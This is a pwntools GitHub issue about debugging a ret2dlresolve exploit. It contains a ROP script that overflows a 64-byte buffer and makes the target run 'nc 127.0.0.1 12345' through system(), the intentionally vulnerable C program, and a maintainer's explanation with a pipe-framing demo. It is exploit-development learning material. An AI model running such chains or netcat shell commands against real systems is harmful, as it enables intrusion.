Gallopsled / pwntools

CTF framework and exploit development library
http://pwntools.com

Inconsistency detected by ld.so #2397

Closed escapemarius2 closed 1 month ago

escapemarius2 commented 2 months ago

I try to use the ret2dlresolve technique, but it doesn't seem to work properly. Very often I get the error message: `Inconsistency detected by ld.so: dl-runtime.c: 63: _dl_fixup: Assertion `ELFW(R_TYPE)(reloc->r_info) == ELF_MACHINE_JMP_SLOT' failed!`

What can I do against this?

code:

```python
from pwn import *

# Target binary; also sets context (arch, bits, endianness) from it
elf = context.binary = ELF('./abc', checksec=True)
p = elf.process()
rop = ROP(elf)

# Fake link_map / relocation data that makes _dl_fixup resolve "system"
dlresolve = Ret2dlresolvePayload(elf, symbol='system', args=['nc 127.0.0.1 12345'])

rop.raw('A' * 76)                    # padding up to the saved return address
rop.read(0, dlresolve.data_addr)     # read the dlresolve data into memory
rop.ret2dlresolve(dlresolve)         # jump into the PLT resolver with the fake reloc

p.sendline(rop.chain())
p.sendline(dlresolve.payload)
p.interactive()
```

code:

```c
#include <unistd.h>

void vuln(void) {
    char buf[64];
    read(STDIN_FILENO, buf, 200);   /* reads up to 200 bytes into a 64-byte buffer */
}

int main(int argc, char **argv) {
    vuln();
    return 0;
}
```

peace-maker commented 2 months ago

What's your ld.so version? You're not sending 200 bytes, so your second sendline might get eaten by the first read instead of the one in the rop chain. Debug the payload to see if the rop chain is executing correctly. Check how the docs send the payload. https://docs.pwntools.com/en/latest/rop/ret2dlresolve.html
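An added illustration of the framing problem peace-maker points at (this is not code from the issue or from pwntools): a pipe is a byte stream, so a single `read(0, buf, 200)` returns whatever is already queued, up to 200 bytes, regardless of how many `sendline` calls produced it. The two "lines" below are constructed stand-ins for the two messages the issue sends back-to-back; `READ_SIZE` matches the 200 in the issue's C code.

```python
import os

READ_SIZE = 200  # byte count requested by the target's read(), taken from the issue's C code


def reads_after_writes(chunks, read_size=READ_SIZE):
    """Queue every chunk into a pipe first, then drain it with read(read_size)
    calls and return the byte string each read() produced.

    This mirrors a target that calls read(0, buf, 200) after the sender has
    already written several lines: read() takes what is buffered, up to
    read_size bytes, and does not stop at newline boundaries.
    """
    r, w = os.pipe()
    for chunk in chunks:
        os.write(w, chunk)
    os.close(w)                      # EOF for the reader once the buffer is drained
    out = []
    while True:
        data = os.read(r, read_size)
        if not data:
            break
        out.append(data)
    os.close(r)
    return out


# Constructed stand-ins for the two messages sent one after the other.
FIRST_LINE = b"A" * 76 + b"<rop chain>\n"       # 88 bytes: far less than READ_SIZE
SECOND_LINE = b"<dlresolve data>\n"


def unpadded_send():
    """Two short lines queued back-to-back: one read(200) swallows both."""
    return reads_after_writes([FIRST_LINE, SECOND_LINE])


def padded_send():
    """Pad the first message to exactly READ_SIZE bytes, so the first read()
    stops at that boundary and the second line is left for the next read()."""
    padded = FIRST_LINE.ljust(READ_SIZE, b"\x00")
    return reads_after_writes([padded, SECOND_LINE])


if __name__ == "__main__":
    print("unpadded:", unpadded_send())   # one element containing both lines
    print("padded:  ", padded_send())     # two elements, second is SECOND_LINE
```

The first function returns a single chunk holding both lines, which is exactly the situation in which the second `sendline` never reaches the `read` issued by the ROP chain; the second function shows why sizing the first message to the target's read length (as the pwntools docs do for this technique) keeps the two reads separated.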

peace-maker commented 1 month ago

I'm assuming this is solved, please comment if it's still a problem